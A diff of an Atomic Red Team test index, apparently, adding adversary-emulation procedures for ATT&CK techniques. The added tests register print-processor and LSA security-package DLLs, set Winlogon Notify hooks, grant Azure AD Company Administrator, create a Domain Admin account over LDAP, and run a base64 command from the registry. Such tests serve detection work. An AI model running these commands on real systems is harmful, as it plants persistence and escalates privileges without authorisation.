+        cleanup_command: 'gcloud iam roles delete #{role-name} --project=#{project-id}
+
+          '
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Requires gcloud
+
+          '
+        prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
+          1; fi;
+
+          '
+        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
+          this atomic test : https://cloud.google.com/sdk/docs/install"
+
+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
+          '
  T1480.001:
    technique:
      x_mitre_platforms:
@@ -32451,7 +32719,7 @@ privilege-escalation:
      auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a
      description: |
        Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
-        reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe"
+        reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "C:\temp\AtomicRedteam.exe"
      supported_platforms:
      - windows
      input_arguments:
@@ -33692,7 +33960,7 @@ privilege-escalation:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -33732,7 +34000,43 @@ privilege-escalation:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
-    atomic_tests: []
+      identifier: T1547.012
+    atomic_tests:
+    - name: Print Processors
+      auto_generated_guid: f7d38f47-c61b-47cc-a59d-fc0368f47ed0
+      description: |
+        Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors.
+        The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.
+
+        Note: The test assumes a x64 Windows operating system.
+
+        The payload source code is based on a blog post by stmxcsr: [https://stmxcsr.com/persistence/print-processor.html](https://stmxcsr.com/persistence/print-processor.html)
+      supported_platforms:
+      - windows
+      input_arguments:
+        restart:
+          description: set to 1 if you want the computer to reboot as part of the
+            test
+          type: integer
+          default: 0
+      executor:
+        command: |
+          if( $(get-service -Name spooler).StartType -eq "Disabled") {Set-Service -Name "spooler" -StartupType Automatic}
+          net stop spooler
+          Copy-Item $PathToAtomicsFolder\T1547.012\bin\AtomicTest.dll C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll
+          reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /v "Driver" /d "AtomicTest.dll" /t REG_SZ /f
+          net start spooler
+          if(#{restart}){
+            Restart-Computer
+          }
+        cleanup_command: |
+          net stop spooler
+          rm -force C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll -ErrorAction SilentlyContinue
+          rm -force C:\Users\Public\AtomicTest.txt -ErrorAction SilentlyContinue
+          remove-item "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" -Force -ErrorAction SilentlyContinue
+          net start spooler
+        name: powershell
+        elevation_required: true
  T1574.001:
    technique:
      modified: '2023-03-30T21:01:51.098Z'
@@ -34402,7 +34706,7 @@ privilege-escalation:
          default: "$PathToAtomicsFolder\\T1547.010\\bin\\PortMonitor.dll"
      executor:
        command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam"
-          /v "Driver" /d "#{monitor_dll}" /t REG_SZ
+          /v "Driver" /d "#{monitor_dll}" /t REG_SZ /f

          '
        cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam"
@@ -35388,28 +35692,43 @@ privilege-escalation:
      - Administrator
      identifier: T1547.005
    atomic_tests:
-    - name: Modify SSP configuration in registry
+    - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider
+        configuration in registry
      auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e
+      description: |
+        Add a value to a Windows registry Security Support Provider pointing to a payload .dll which will normally need to be copied in the system32 folder.
+        A common DLL used with this techquite is the minilib.dll from mimikatz, see https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+          Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' -Value "$oldvalue";
+          $newvalue = "AtomicTest.dll";
+          Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $newvalue
+        cleanup_command: |-
+          $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+          Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value "$oldvalue";
+          Remove-ItemProperty -Path  "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old';
+        name: powershell
+        elevation_required: true
+    - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support
+        Provider configuration in registry
+      auto_generated_guid: de3f8e74-3351-4fdb-a442-265dbf231738
      description: Add a value to a Windows registry SSP key, simulating an adversarial
        modification of those keys.
      supported_platforms:
      - windows
-      input_arguments:
-        fake_ssp_dll:
-          description: Value added to registry key. Normally refers to a DLL name
-            in C:\Windows\System32.
-          type: string
-          default: not-a-ssp
      executor:
        command: |
-          # run these in sequence
-          $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
-          $SecurityPackagesUpdated = $SecurityPackages
-          $SecurityPackagesUpdated += "#{fake_ssp_dll}"
-          Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
-
-          # revert (before reboot)
-          Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
+          $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+          Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' -Value "$oldvalue";
+          $newvalue = "AtomicTest.dll";
+          Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value $newvalue
+        cleanup_command: |-
+          $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+          Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value "$oldvalue";
+          Remove-ItemProperty -Path  "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old';
        name: powershell
        elevation_required: true
  T1181:
@@ -37269,7 +37588,9 @@ privilege-escalation:
      description: |
        PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.

-        Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff.
+        Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon.
+
+        Please note that Winlogon Notifications have been removed as of Windows Vista / Windows Server 2008 and that this test thus only applies to erlier versions of Windows.
      supported_platforms:
      - windows
      input_arguments:
@@ -37277,10 +37598,17 @@ privilege-escalation:
          description: Path of notification package to execute
          type: path
          default: C:\Windows\Temp\atomicNotificationPackage.dll
+        function_to_execute:
+          description: Function in notification package to execute
+          type: string
+          default: AtomicTestFunction
      executor:
        command: |
-          New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
-          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
+          New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force
+          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "DllName" "#{binary_to_execute}" -Type ExpandString -Force
+          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Logon" "#{function_to_execute}" -Force
+          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Impersonate" 1 -Type DWord -Force
+          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Asynchronous" 0 -Type DWord -Force
        cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
          -Force -ErrorAction Ignore

@@ -44937,7 +45265,6 @@ privilege-escalation:
        name: sh
        elevation_required: false
        command: |
-          gcloud auth login --no-launch-browser
          gcloud config set project #{project-id}
          gcloud iam service-accounts create #{service-account-name}
          gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
@@ -44957,6 +45284,13 @@ privilege-escalation:
        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
          this atomic test : https://cloud.google.com/sdk/docs/install"

+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
          '
    - name: Azure Persistence Automation Runbook Created or Modified
      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
@@ -45037,6 +45371,65 @@ privilege-escalation:
          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
          cd $PathToAtomicsFolder/T1078.004/src/T1078.004-2/
          terraform destroy -auto-approve
+    - name: GCP - Create Custom IAM Role
+      auto_generated_guid: 3a159042-69e6-4398-9a69-3308a4841c85
+      description: "This atomic will create a new IAM role. The default role permissions
+        are: *IAM Service Account Get*. The idea for this Atomic came from a Rule
+        published by the Elastic team.\n\nIdentifies an Identity and Access Management
+        (IAM) custom role creation in Google Cloud Platform (GCP). \nCustom roles
+        are user-defined, and allow for the bundling of one or more supported permissions
+        to meet specific needs. \nCustom roles will not be updated automatically and
+        could lead to privilege creep if not carefully scrutinized.\n\nThis atomic
+        will create a new IAM role. The default role permissions are: *IAM Service
+        Account Get*\n\nReference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml\n"
+      supported_platforms:
+      - iaas:gcp
+      input_arguments:
+        project-id:
+          description: ID of the GCP Project you to execute the command against.
+          type: string
+          default: atomic-test-1
+        role-name:
+          description: The name of the role to be created.
+          type: string
+          default: AtomicRedTeamRole
+        role-description:
+          description: The description of the role to be created.
+          type: string
+          default: Atomic Red Team Custom IAM Role
+        roles:
+          description: List of roles to be applied
+          type: string
+          default: iam.serviceAccounts.get
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          gcloud config set project #{project-id}
+          gcloud iam roles create #{role-name} --description="#{role-description}" --permissions=#{roles} --project=#{project-id}
+        cleanup_command: 'gcloud iam roles delete #{role-name} --project=#{project-id}
+
+          '
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Requires gcloud
+
+          '
+        prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
+          1; fi;
+
+          '
+        get_prereq_command: 'echo "Please Install Google Cloud SDK before running
+          this atomic test : https://cloud.google.com/sdk/docs/install"
+
+          '
+      - description: "Check if user is logged in \n"
+        prereq_command: 'gcloud config get-value account
+
+          '
+        get_prereq_command: 'gcloud auth login --no-launch-browser
+
+          '
  T1053.002:
    technique:
      x_mitre_platforms:
@@ -50154,7 +50547,7 @@ execution:
      executor:
        command: |
          # Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
-          reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
+          reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
          iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
        cleanup_command: |
          Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
@@ -55226,7 +55619,7 @@ persistence:
      auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a
      description: |
        Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
-        reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe"
+        reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "C:\temp\AtomicRedteam.exe"
      supported_platforms:
      - windows
      input_arguments:
@@ -56449,7 +56842,7 @@ persistence:
  T1098.003:
    technique:
      modified: '2023-04-14T22:48:50.142Z'
-      name: Additional Cloud Roles
+      name: 'Account Manipulation: Additional Cloud Roles'
      description: "An adversary may add additional roles or permissions to an adversary-controlled
        cloud account to maintain persistent access to a tenant. For example, adversaries
        may update IAM policies in cloud-based environments or add a new global administrator
@@ -56552,7 +56945,53 @@ persistence:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1098.003
+    atomic_tests:
+    - name: Azure AD - Add Company Administrator Role to a user
+      auto_generated_guid: 4d77f913-56f5-4a14-b4b1-bf7bb24298ad
+      description: 'Add an existing Azure user account the Company Administrator Role.
+
+        '
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Azure AD username
+          type: string
+          default: jonh@contoso.com
+        password:
+          description: Azure AD password
+          type: string
+          default: p4sswd
+        target_user:
+          description: Name of the user who will be assigned the Company Admin role
+          type: string
+          default: default
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'MSOnline module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name MSOnline -ErrorAction
+          SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name MSOnline -Force
+
+          '
+      executor:
+        command: |
+          Import-Module MSOnline
+          $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
+          Connect-MsolService -Credential $Credential
+          Add-MsolRoleMember -RoleName "Company Administrator" -RoleMemberEmailAddress "#{target_user}"
+        cleanup_command: 'Remove-MsolRoleMember -RoleName "Company Administrator"
+          -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
+
+          '
+        name: powershell
+        elevation_required: false
  T1547.012:
    technique:
      x_mitre_platforms:
@@ -56580,7 +57019,7 @@ persistence:
        description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
          Group. Retrieved August 24, 2020.
      modified: '2020-10-09T16:05:36.344Z'
-      name: Print Processors
+      name: 'Boot or Logon Autostart Execution: Print Processors'
      description: "Adversaries may abuse print processors to run malicious DLLs during
        system boot for persistence and/or privilege escalation. Print processors
        are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -56620,7 +57059,43 @@ persistence:
      x_mitre_permissions_required:
      - Administrator
      - SYSTEM
-    atomic_tests: []
+      identifier: T1547.012
+    atomic_tests:
+    - name: Print Processors
+      auto_generated_guid: f7d38f47-c61b-47cc-a59d-fc0368f47ed0
+      description: |
+        Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors.
+        The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.
+
+        Note: The test assumes a x64 Windows operating system.
+
+        The payload source code is based on a blog post by stmxcsr: [https://stmxcsr.com/persistence/print-processor.html](https://stmxcsr.com/persistence/print-processor.html)
+      supported_platforms:
+      - windows
+      input_arguments:
+        restart:
+          description: set to 1 if you want the computer to reboot as part of the
+            test
+          type: integer
+          default: 0
+      executor:
+        command: |
+          if( $(get-service -Name spooler).StartType -eq "Disabled") {Set-Service -Name "spooler" -StartupType Automatic}
+          net stop spooler
+          Copy-Item $PathToAtomicsFolder\T1547.012\bin\AtomicTest.dll C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll
+          reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /v "Driver" /d "AtomicTest.dll" /t REG_SZ /f
+          net start spooler
+          if(#{restart}){
+            Restart-Computer
+          }
+        cleanup_command: |
+          net stop spooler
+          rm -force C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll -ErrorAction SilentlyContinue
+          rm -force C:\Users\Public\AtomicTest.txt -ErrorAction SilentlyContinue
+          remove-item "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" -Force -ErrorAction SilentlyContinue
+          net start spooler
+        name: powershell
+        elevation_required: true
  T1574.001:
    technique:
      modified: '2023-03-30T21:01:51.098Z'
@@ -58155,7 +58630,7 @@ persistence:
          default: "$PathToAtomicsFolder\\T1547.010\\bin\\PortMonitor.dll"
      executor:
        command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam"
-          /v "Driver" /d "#{monitor_dll}" /t REG_SZ
+          /v "Driver" /d "#{monitor_dll}" /t REG_SZ /f

          '
        cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam"
@@ -58847,28 +59322,43 @@ persistence:
      - Administrator
      identifier: T1547.005
    atomic_tests:
-    - name: Modify SSP configuration in registry
+    - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider
+        configuration in registry
      auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e
+      description: |
+        Add a value to a Windows registry Security Support Provider pointing to a payload .dll which will normally need to be copied in the system32 folder.
+        A common DLL used with this techquite is the minilib.dll from mimikatz, see https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+          Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' -Value "$oldvalue";
+          $newvalue = "AtomicTest.dll";
+          Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $newvalue
+        cleanup_command: |-
+          $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+          Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value "$oldvalue";
+          Remove-ItemProperty -Path  "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old';
+        name: powershell
+        elevation_required: true
+    - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support
+        Provider configuration in registry
+      auto_generated_guid: de3f8e74-3351-4fdb-a442-265dbf231738
      description: Add a value to a Windows registry SSP key, simulating an adversarial
        modification of those keys.
      supported_platforms:
      - windows
-      input_arguments:
-        fake_ssp_dll:
-          description: Value added to registry key. Normally refers to a DLL name
-            in C:\Windows\System32.
-          type: string
-          default: not-a-ssp
      executor:
        command: |
-          # run these in sequence
-          $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
-          $SecurityPackagesUpdated = $SecurityPackages
-          $SecurityPackagesUpdated += "#{fake_ssp_dll}"
-          Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
-
-          # revert (before reboot)
-          Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
+          $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+          Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' -Value "$oldvalue";
+          $newvalue = "AtomicTest.dll";
+          Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value $newvalue
+        cleanup_command: |-
+          $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+          Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value "$oldvalue";
+          Remove-ItemProperty -Path  "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old';
        name: powershell
        elevation_required: true
  T1004:
@@ -60799,7 +61289,9 @@ persistence:
      description: |
        PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.

-        Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff.
+        Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon.
+
+        Please note that Winlogon Notifications have been removed as of Windows Vista / Windows Server 2008 and that this test thus only applies to erlier versions of Windows.
      supported_platforms:
      - windows
      input_arguments:
@@ -60807,10 +61299,17 @@ persistence:
          description: Path of notification package to execute
          type: path
          default: C:\Windows\Temp\atomicNotificationPackage.dll
+        function_to_execute:
+          description: Function in notification package to execute
+          type: string
+          default: AtomicTestFunction
      executor:
        command: |
-          New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
-          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
+          New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force
+          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "DllName" "#{binary_to_execute}" -Type ExpandString -Force
+          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Logon" "#{function_to_execute}" -Force
+          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Impersonate" 1 -Type DWord -Force
+          Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Asynchronous" 0 -Type DWord -Force
        cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
          -Force -ErrorAction Ignore

@@ -62185,6 +62684,115 @@ persistence:
          '
        name: powershell
        elevation_required: false
+    - name: Active Directory Create Admin Account
+      auto_generated_guid: 562aa072-524e-459a-ba2b-91f1afccf5ab
+      description: 'Use Admin Credentials to Create A Domain Admin Account
+
+        '
+      supported_platforms:
+      - linux
+      input_arguments:
+        domain:
+          description: The domain to be tested
+          type: string
+          default: example
+        top_level_domain:
+          description: The top level domain (.com, .test, .remote, etc... following
+            domain, minus the .)
+          type: string
+          default: test
+        admin_user:
+          description: username@domain of a user with admin privileges
+          type: string
+          default: admin@example.test
+        admin_password:
+          description: password of the user with admin privileges referenced in admin_user
+          type: string
+          default: s3CurePssw0rD!
+        domain_controller:
+          description: Name of the domain_controller machine, defined in etc/hosts
+          type: string
+          default: adVM
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Packages sssd-ad sssd-tools realmd adcli installed and realm
+          available
+
+          '
+        prereq_command: 'which ldapadd && which ldapmodify
+
+          '
+        get_prereq_command: 'echo ldapadd or ldapmodify not found; exit 1
+
+          '
+      executor:
+        elevation_required: false
+        command: |
+          echo "dn: CN=Admin User,CN=Users,DC=#{domain},DC=#{top_level_domain}\nchangetype: add\nobjectClass: top\nobjectClass: person\nobjectClass: organizationalPerson\nobjectClass: user\ncn: Admin User\nsn: User\ngivenName: Atomic User\nuserPrincipalName: adminuser@#{domain}.#{top_level_domain}\nsAMAccountName: adminuser\nuserAccountControl: 512\nuserPassword: {CLEARTEXT}s3CureP4ssword123!\nmemberOf: CN=Domain Admins,CN=Users,DC=#{domain},DC=#{top_level_domain}" > tempadmin.ldif
+          echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+          ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+        cleanup_command: |
+          echo removing Atomic User (temporary user)
+          echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
+          ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
+          rm deleteuser.ldif
+          rm tempadmin.ldif
+        name: sh
+    - name: Active Directory Create User Account (Non-elevated)
+      auto_generated_guid: 8c992cb3-a46e-4fd5-b005-b1bab185af31
+      description: 'Use Admin Credentials to Create A Normal Account (as means of
+        entry)
+
+        '
+      supported_platforms:
+      - linux
+      input_arguments:
+        domain:
+          description: The domain to be tested
+          type: string
+          default: example
+        top_level_domain:
+          description: The top level domain (.com, .test, .remote, etc... following
+            domain, minus the .)
+          type: string
+          default: test
+        admin_user:
+          description: username@domain of a user with admin privileges
+          type: string
+          default: user@example.test
+        admin_password:
+          description: password of the user
+          type: string
+          default: s3CurePssw0rD!
+        domain_controller:
+          description: Name of the domain_controller machine, defined in etc/hosts
+          type: string
+          default: adVM
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Packages sssd-ad sssd-tools realmd adcli installed and realm
+          available, ldapadd, ldapmodify
+
+          '
+        prereq_command: |
+          which ldapadd
+          which ldapmodify
+        get_prereq_command: 'echo ldapadd or ldapmodify not found; exit 1
+
+          '
+      executor:
+        elevation_required: false
+        command: |
+          echo "dn: cn=Atomic User, cn=Users,dc=#{domain},dc=#{top_level_domain}\nobjectClass: person\ncn: Atomic User\nsn: User" > tempadmin.ldif
+          echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+          ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+        cleanup_command: |
+          echo removing Atomic User (temporary user)
+          echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
+          ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
+          rm deleteuser.ldif
+          rm tempadmin.ldif
+        name: sh
  T1542.002:
    technique:
      x_mitre_platforms:
@@ -65818,6 +66426,80 @@ persistence:
          | Out-File $credFile\n}\nelse {\n    Write-Host -ForegroundColor Yellow
          \"You must store the password of the current user by running the prerequisite
          commands first\"\n}\n"
+    - name: GCP - Delete Service Account Key
+      auto_generated_guid: 7ece1dea-49f1-4d62-bdcc-5801e3292510
+      description: "This Atomic will: \n  - Create a service account\n  - Create a
+        service account key, \n  - Store the result of retrieving a single key for
+        that service account as a variable\n  - Pass that variable for deletion\n
+        \ - Delete the service account\n\nThe idea for this Atomic came from a Rule
+        published by the Elastic team.\n\nIdentifies the deletion of an Identity and
+        Access Management (IAM) service account key in Google Cloud Platform (GCP).\nEach
+        service account is associated with two sets of public/private RSA key pairs
+        that are used to authenticate. \nIf a key is deleted, the application will
+        no longer be able to access Google Cloud resources using that key. A security
+        best practice is to rotate your service account keys regularly.\n\nReference:
+        https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml\n"
+      supported_platforms:
+      - iaas:gcp
+      input_arguments:
+        project_id:
+          description: ID of the GCP Project you to execute the command against.
+          type: string
+          default: atomic-test-1
+        service_name:
+          description: The name of the service account.
+          type: string
+          default: atomic-service-account
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          gcloud config set project #{project_id}
+          KEY=`gcloud iam service-accounts keys list --iam-account=#{service_name}@#{project_id}.iam.gserviceaccount.com --format="value(KEY_ID)" --limit=1`
